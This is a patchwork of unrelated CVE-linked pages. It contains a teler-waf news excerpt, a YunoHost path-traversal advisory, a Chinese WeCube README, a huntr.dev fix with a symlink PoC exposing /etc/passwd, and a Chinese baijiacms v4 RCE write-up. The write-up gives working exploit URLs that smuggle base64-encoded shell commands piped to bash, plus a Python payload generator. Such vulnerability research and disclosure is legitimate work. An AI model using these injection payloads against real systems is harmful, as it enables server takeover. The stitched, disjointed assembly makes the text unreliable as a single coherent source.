“When a client makes a request to a route protected by teler-waf, the request is first checked against the teler IDS to detect known malicious patterns,“ the developer says. “If no malicious patterns are detected, the request is then passed through for further processing.”

**Show and teler**

Siswanto is also the creator of teler, a real-time HTTP intrusion detection and threat alert system.

He told us that the popularity of the Go framework persuaded him to adapt teler IDS to resemble a past project, AntiScanScanClub, an automatic website scan blocker package.

“My goal was to use teler IDS functionality not only for detection, but also for early prevention,” he explains. “I could say that teler-waf is a progress from the AntiScanScanClub.”

At this time, there is no formal development timeline, although there are hopes for future contributors to join and some milestones are “still being determined”.

Teler-waf’s inaugural and current release, v0.0.1, is labeled as experimental.

Siswanto said: “It \[is\] experimental because there are currently some TODO lists I \[have\] to revisit that need to be addressed, which might be major changes that could affect both configuration and performance. I hope that teler-waf will become stable and ready for use in production in the near future.”

As Go continues to increase in popularity, other developers have also released tools to protect applications built using the language. In December, for instance, Viktor Chuchurski and Alessandro Cotto released Safeurl, software designed to thwart server-side request forgery (SSRF) attacks.

RELATED Safeurl HTTP library brings SSRF protection to Go applications

Meet teler-waf: Security-focused HTTP middleware for the Go framework

A vulnerability classified as critical has been found in YunoHost-Apps transmission_ynh. Affected is an unknown function of the file conf/nginx.conf. The manipulation leads to path traversal. The name of the patch is f136dfd44eda128129e5fd2d850a3a3c600e6a4a. It is recommended to apply a patch to fix this issue. VDB-217638 is the identifier assigned to this vulnerability.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2020-36647: [N.B. : App to be downgraded to level 4 if this ain't fixed soon...] Update nginx.conf to protect against path traversal issue by alexAubin · Pull Request #75 · YunoHost-Apps/transmission_ynh

An issue was discovered in WeCube platform 3.2.2. A DOM XSS vulnerability has been found on the plugin database execution page.

**WeCube**

       

中文 / English

**引言**

WeCube是一套开源的，一站式IT架构管理和运维管理工具，主要用于简化分布式架构IT管理，并可以通过插件进行功能扩展。 Releases快速入口

**在线体验**

点我在线体验 (体验用户/密码：admin/admin)

> 注意：
> 
> 1.  体验环境每天凌晨2:00-4:00进行重建，重建时间段内环境将不可用，且所有用户修改内容将被丢弃
> 2.  多人同时使用admin用户，可能会相互影响，若希望更好的体验可参照：WeCube全量体验过程说明 搭建私有环境

**起源**

微众银行在分布式架构实践的过程中，发现将银行核心系统构建于分布式架构之上，会遇到一些与传统单体应用不同的痛点（例如，服务器增多，部署难度大；调用链长，全链路跟踪困难； 系统复杂，问题定位时间长等），在逐步解决这些痛点的过程中，总结了一套IT管理的方法论和最佳实践，并研发了与之配套的IT管理工具体系。WeCube就是将该套方法论和最佳实践，从微众内部众多IT管理工具体系中提炼出来，整合成一套开箱即用的IT管理解决方案。

**设计理念**

WeCube的设计理念与IT系统生命周期管理基本一致。可以通过“六个维度和一个核心”来阐述。

**一个核心：通过注册新插件持续扩展WeCube的功能，通过如下5个能力实现插件注册及协作。插件注册详见“插件注册”。**

*   菜单布局：WeCube提供前端UI基座和前端开发规范，使各个插件的前端交互能够无缝集成到WeCube，进而形成一个统一平台。
*   权限模型：WeCube的权限模型提供“用户-角色-菜单”三级权限模型，并提供统一认证方案。数据权限及API权限，由插件自身控制。
*   流程编排：WeCube内置一套标准的BPMN流程引擎，可以通过客户自定义编排驱动插件协同工作，减少人工干预。编排设计详见“编排设计”。
*   数据模型：插件需要将自身需要提供给其他插件使用的数据模型注册到WeCube的统一数据模型，然后通过标准的CRUD接口提供数据访问服务。
*   系统参数：WeCube的全局参数、插件需要客户修改、插件需要暴露给其他插件使用的参数，需要注册到WeCube的系统参数内。

**六个维度：通过定义六个维度的菜单，并将插件功能有组织性的插入这六个维度菜单中，形成对IT系统全生命周期的有效管理。**

*   任务：汇聚多种类型任务，形成一体化的工作平台。工作内容清晰可见，轻重缓急一目了然。
*   设计：定义模型和规范，形成标准化设计语言。通过规范化设计及图形化展示，清晰、准确地描绘出对分布式架构的期望。
*   执行：通过各类自动化、标准化任务的执行，将分布式架构的期望设计变成现实存在，消除人员能力参差不齐导致的实现差异。
*   监测：定义全方位的监测项指标，通过持续收集监测数据，精确反映现状，并发现现实与期望的差异项。
*   智慧：应用机器学习等技术，赋予智慧能力。通过数学建模，制定应对监测发现的差异项的处理策略。
*   调整：通过执行处理策略来不断进行动态调整，最终保持现实与期望的对等，进而使系统稳定运行。

**技术实现**

WeCube分为核心功能模块和插件模块。

核心功能模块使用Java/MySQL/VUE开发，主要负责工作流程，可视化和核心数据存储。

插件模块用于功能扩展，分为资源管理、数据整合、功能增强三类插件。对于插件，WeCube定义了一套接口规范，插件开发者可以在遵循规范的前提下，自行选择开发语言。目前已有的插件使用的开发语言包括GO语言和Java。

**系统架构****WeCube 2.x版本**

组件间详细关联图：

1, Portal web：浏览器客户，客户与WeCube交互的入口。  
2, Portal nginx：接收客户端访问请求，如果请求静态资源，返回Core或插件的静态资源文件。如请求动态服务，转发到后端API gateway。Portal nginx建议采用负载均衡实现高可用，也可以使用keepalived做主从高可用。  
3, API gateway：负责Portal nginx或其他外部系统的动态服务请求的路由分发。

*   A） 登录认证请求，转发到Auth server，使用用户名密码换取Token。Token采用非对称加密，包含用户名、角色、菜单权限信息。
*   B） Core服务请求，转发到Core。比如角色添加、插件注册、编排设计等等。
*   C） Plugin服务请求，转发到对于的Plugin。比如CMDB配置管理、监控数据查询、任务管理等。

建议负载均衡实现高可用，也可以使用keepalived做主从高可用。  
APIGateway启动时通过Core获取插件实例列表，并建立路由规则。  
同时APIGateway会监测Core、Auth Server、Plugins的状态，实现Core、Auth server、Plugins实例的主从类型的高可用。

4, Auth server：主要负责用户认证服务，并返回含有用于认证的token。由API gateway实现主从类型的高可用。  
5, Core：WeCube的核心模块。提供插件注册、编排设计、权限管理、批量任务、插件运行资源管理、数据模型、系统参数等核心功能。 由API gateway实现主从类型的高可用。  
6, MYSQL：WeCube Core和Auth server的数据库实例。建议MYSQL主从实现高可用。  
7, S3:插件包镜像文件的存储。插件注册是写入镜像文件，插件实例启动时读取镜像文件。  
8, Plugin instance-Docker：插件运行的容器母机，可以配置多台母机，运行多个插件实例，提供高可用。  
9, Plugin instance-MYSQL：插件运行所需要的数据库实例，为每个需要数据库的插件建立独立数据库。建议MYSQL主从实现高可用。  
10, Plugin instance-S3：插件运行所需要的对象存储，为每个需要存储文件的插件分配单独的桶。  
11, Plugin instance-Squid：插件访问外部资源的代理服务器，按域名放通白名单。在安全要求较高的时建议部署。  
以上11个组件组成WeCube Platform。

**主要功能简介**

WeCube的功能菜单设计与设计理念保持一致。分别是任务、设计、执行、监测、智慧、调整、协同、系统。

*   系统
    
    *   系统参数：管理WeCube Platform运行所需的系统参数。
    *   资源管理：管理WeCube提供的资源如容器母机及资源上运行的实例。
    *   权限管理：管理WeCube Platform的用户，角色和菜单，可以对权限进行菜单级别的管控。
    *   高危规则配置：管理高危命令的检测规则，当使用平台执行功能时命中规则将弹窗提示进行二次确认。
*   协同
    
    *   插件注册：选择插件包上传，插件包需声明本插件的依赖、所需菜单、数据模型、系统参数、权限设定及运行资源，注册后通过容器运行，支持多实例，可以查看插件运行的日志。选择插件服务，通过插件运行的参数关联CMDB数据模型的属性值，形成注册。
        
    *   任务编排：比如设计一个VPC创建的编排。包括创建VPC、创建子网、创建VM。流程的每个执行节点需要关联插件。
        
*   设计（WeCMDB插件提供）
    
    *   规划设计：用于设计机房结构。
        
    *   资源规划：用于实例化一个机房，特别是两地三中心结构。
        
    *   应用架构设计：用于设计一个应用的逻辑架构。
        
    *   应用部署设计：用于实际部署一个应用。支持灰度发布。
        
    *   CI数据管理/查询：通过模型图形进入单个数据管理以及查询。
        
    *   CI综合查询管理/数据综合查询：用于配制多CI属性报表。比如一个应用使用到了哪些主机。
        
*   执行
    
    *   编排任务执行：在选择编排后可对选择目标对象执行编排，支持灰度操作。比如重启某个资源集的5台主机。
        
    *   物料管理（Artifacts插件提供）：管理应用程序的包。可以定义各种文件，可以配置环境差异导致的变量替换规则，不需要人工处理。
        
    *   批量执行：通过配置综合查询并选择目标。在通过特定插件来执行任务。比如某个应用的所有主机，执行一个用户权限变更。
        
*   任务（Service-Management插件提供）
    
    *   模板管理：服务目录管理， 服务请求模板管理；
        
    *   服务管理：服务请求管理，任务管理；
        
*   监测（Open-Monitor插件提供）
    
    *   Agent管理: 注册、启动、停止；
        
    *   数据管理: 提供数据采集配置， 数据查询等功能；
        
    *   告警管理: 提供阈值配置、日志监控、告警触发等功能；
        
    *   视图管理: 提供图形配置和自定义视图功能；
        
*   调整（规划中）
    
*   智慧
    
    *   容量建模：通过多元回归分析建模，获取业务量指标和资源消耗之间的系数关系。
        
    *   容量预测：将预测的业务量指标输入到模型中，获取合理的资源容量配置建议。
        

**核心流程时序说明：**

插件注册时序图:  

编排任务执行:  

**快速入门**

WeCube采用容器化部署。

如何编译WeCube，请查看以下文档 WeCube编译文档

如何安装WeCube， 请查看以下文档 WeCube部署文档@GitHub WeCube部署文档@Gitee

**用户手册**

更多关于WeCube的使用和操作说明， 请查看以下文档 WeCube用户手册@GitHub WeCube用户手册@Gitee

**开发者文档**

WeCube使用Java和VUE进行开发，数据存储于MySQL，并依赖Tomcat Web容器运行。

请参考以下文档进行开发环境配置WeCube开发环境配置 请参考以下文档进行插件开发WeCube-Platform插件开发规范

**License**

WeCube是基于 Apache License 2.0 协议， 详情请参考 LICENSE

**社区**

*   如果您想得到最快的响应，请给我们提Issue或扫描下面的二维码，我们会第一时间反馈。
    
*   联系我们：fintech@webank.com

CVE-2022-37787: GitHub - WeBankPartners/wecube-platform: WeCube Platform

A vulnerability classified as critical was found in SimbCo httpster. This vulnerability affects the function fs.realpathSync of the file src/server.coffee. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. The name of the patch is d3055b3e30b40b65d30c5a06d6e053dffa7f35d0. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216748.

https://huntr.dev/users/Mik317 has fixed the Path Traversal vulnerability 🔨. Mik317 has been awarded $25 for fixing the vulnerability through the huntr bug bounty program 💵. Think you could fix a vulnerability like this?

Get involved at https://huntr.dev/

Q | A  
Version Affected | ALL  
Bug Fix | YES  
Original Pull Request | 418sec#1  
Vulnerability README | https://github.com/418sec/huntr/blob/master/bounties/npm/httpster/1/README.md

**User Comments:****📊 Metadata \*****Bounty URL: https://www.huntr.dev/bounties/1-npm-httpster****⚙️ Description \***

The httpster file server was vulnerable against a path traversal issue which existed because symlinks were fetched and their content served without any warn/error.

**💻 Technical Description \***

I inserted a new router inside the express server which was created by httpster and used fs.lstat to check if the requested file is or not a symlink.  
In case it is and the --symlink flag isn't specified by the server (default false like in other servers like Nginx), an error is thrown.

**🐛 Proof of Concept (PoC) \***

1.  Download httpster
2.  ln -s /etc/passwd test
3.  httpster
4.  Go on http://localhost:3333/test and the content of the /etc/passwd file is shown

**🔥 Proof of Fix (PoF) \***

1.  Same steps above, but an error is given instead of the content of the /etc/passwd file

1.  Same steps but start the server with httpster --symlink and the /etc/passwd file is shown (option)

**👍 User Acceptance Testing (UAT)**

All ok 😄

CVE-2020-36629: Security Fix for Path Traversal - huntr.dev by huntr-helper · Pull Request #36 · SimbCo/httpster

A Remote Code Execution (RCE) vulnerability was found in includes/baijiacms/common.inc.php in baijiacms v4.

项目地址：https://github.com/baijiacms/baijiacmsV4  
版本：V4.1.4 20170105 FINAL  
环境：

*   php 5.5.38
*   nginx 1.15
*   mysql 5.7.27
*   20.04.1-Ubuntu

漏洞点在文件includes/baijiacms/common.inc.php  
第654行。

**利用**

这个system的功能本来是为了执行压缩图片的。所以要利用该漏洞，需要先登录后台，在附近设置中设置图片压缩比例，否则代码无法运行到此处。

EXP1：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/poc.;echo${IFS}cGluZyBwb2MuZXhyNm1xLmNleWUuaW8gLWMgNA==|base64${IFS}-d|bash;&status=1&beid=1

EXP2：http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;&status=1&beid=1

其中poc可以使用一下代码生成，随后开启web服务确保可以被访问到即可

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  

import base64  
  
cmd = input("cmd>>> ")   
  
b64cmd = base64.b64encode(cmd.encode()).decode()  
  
payload = f"echo {b64cmd}|base64 -d|bash"  
  
print(payload)  
payload = payload.replace(' ','${IFS}')  
print(payload)  
  
name = input("name>>>")  
payload = f"{name}.;{payload};"  
print(payload)  
  
with open(file=webpath+payload,mode='w')as f:  
    f.write('1')  
  
  

**原理**

在该漏洞中，漏洞点为文件includes/baijiacms/common.inc.php  
第654行的system()。该函数位于file\_save()函数中。

1  

system('convert'.$quality\_command.' '.$file\_full\_path.' '.$file\_full\_path);  

其中，$quality\_command无法控制，能够控制的只有$file\_full\_path。

由于上一步调用file\_save()的，是fetch\_net\_file\_upload()函数的return部分

$file\_full\_path的定义往上翻为：

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

$file\_full\_path = WEB\_ROOT .$path . $extpath. $filename;  
  
  
$path = '/attachment/';  
$extpath\="{$extention}/" . date('Y/m/');  
$filename = random(15) . ".{$extention}";  
  
  
$extention = pathinfo($url,PATHINFO\_EXTENSION );  
  

所以能使用的payload只能存在于url后的文件名后缀中，且payload中由于代码功能的限制不能出现，

*   htmlspecialchars()
    
    *   includes/baijiacms.php line92 :$\_GP = irequestsplite($\_GP);
    *   &
    *   “
    *   ’
    *   <
    *   \>
*   后缀 (pathinfo())
    
    *   includes/baijiacms/common.inc.php line 617 :$extention = pathinfo($url,PATHINFO\_EXTENSION );
    *   .
*   file\_get\_contents()
    
    *   includes/baijiacms/common.inc.php line632 :if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) {
    *   空格
*   文件名
    
    *   web服务器系统类型，在windows下限制颇多
    *   windows
        *   \\
        *   /
        *   :
        *   \*
        *   ?
        *   |
    *   linux
        *   /

**htmlspecialchars()**

在该系统中，所有的参数都会经过includes/baijiacms.php进行htmlspecialchars过滤

所以payload中首先排除了 < > “ ‘ &这些符号

**pathinfo()**

pathinfo()会返回文件路径的信息

1  

$extention = pathinfo($url,PATHINFO\_EXTENSION );  

代码中传入了PATHINFO\_EXTENSION参数，根据官方介绍，传入该参数，只会返回最后一个扩展名，扩展名以 . 划分。结合后面的分析，所以payload只能存在与扩展名中

**file\_get\_contents()**

这一步有两个条件，首先file\_get\_contents()需要可以get到文件，其次文件中需要有内容满足file\_put\_contents()

1  

if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false)   

**$settings\[‘image\_compress\_openscale’\]**

最后在file\_save()中还有一步

1  

if(!empty($settings\['image\_compress\_openscale'\]))  

这一步在略读了代码后才知道，它由函数globaPriveteSystemSetting()获的，取自数据库中。

略读代码后才知道，这个需要在后台中开启图片上传压缩才会在数据库中建立数据。以便后续读取。

所以需要在后台的附件设置中开启并设置图片压缩比例（具体数字随意）

**具体利用过程解析**

EXP:http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/\[whoami.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;\](http://42.193.178.194/whoami.%3Becho%24{IFS}d2hvYW1p|base64%24{IFS}-d|bash%3B)&status=1&beid=1

这端url中，主要起作用的是url参数，其他的只是陪跑的（但是也不能删）。url参数原本是远程图片地址。

首先在自己的vps上设置payload，这里我设置的命令为whoami，为了便于区分payload，文件名也取名为whoami。然后使用python开启web服务。

然后登录baijiacms后台，设置一个压缩比例，保存，然后访问

http://192.168.0.64/baijiacmsV4-4.1.4/index.php?mod=site&act=public&do=file&op=fetch&url=http://127.0.0.1/whoami.%3Becho%24%7BIFS%7Dd2hvYW1p%7Cbase64%24%7BIFS%7D-d%7Cbash%3B&status=1&beid=1

然后我们来看debug。

代码运行到fetch\_net\_file\_upload函数中，走到$extention = pathinfo($url,PATHINFO\_EXTENSION );时，截取到了payload：;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

随后是mkdir根据时间，后缀，建立文件夹。之后来到if (file\_put\_contents($file\_tmp\_name, file\_get\_contents($url)) == false) 进行判断，这边我为了方便查看file\_get\_contents和file\_put\_contents哪个会出问题，多加了两行代码。

1  
2  

$flag1 = file\_put\_contents($file\_tmp\_name,"1");  
$flag2 = file\_get\_contents($url);  

在这里之后进入file\_save() 。传入了关键的变量

$file\_full\_path：/www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/G55bRGvfRVr00o3.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

这边经过几个判断后，最后到达system()，最终传入的命令为。

convert -quality 100 /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash; /www/admin/localhost\_80/wwwroot/baijiacmsV4-4.1.4/attachment/;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;/2022/11/AFqEQN31zocEeu1.;echo${IFS}d2hvYW1p|base64${IFS}-d|bash;

由于代码中会根据后缀建立文件夹，所以在system中，payload一共会执行四次，也就是为什么在执行whoami这个payload是，会输出4个www。

**nothing**

1.  在写测试的命令时，如果要用到ping dnslog这类命令，由于linux默认是会一直ping下去的。所以最好加一个-c 4限制次数（系统被搞崩了好多次）
    
2.  php中单引号的字符串和双引号的字符串差距还是挺大的。https://www.cnblogs.com/youxin/archive/2012/02/13/2348551.html。因为这个特性，测试的时候被卡了好久

Tag

#nginx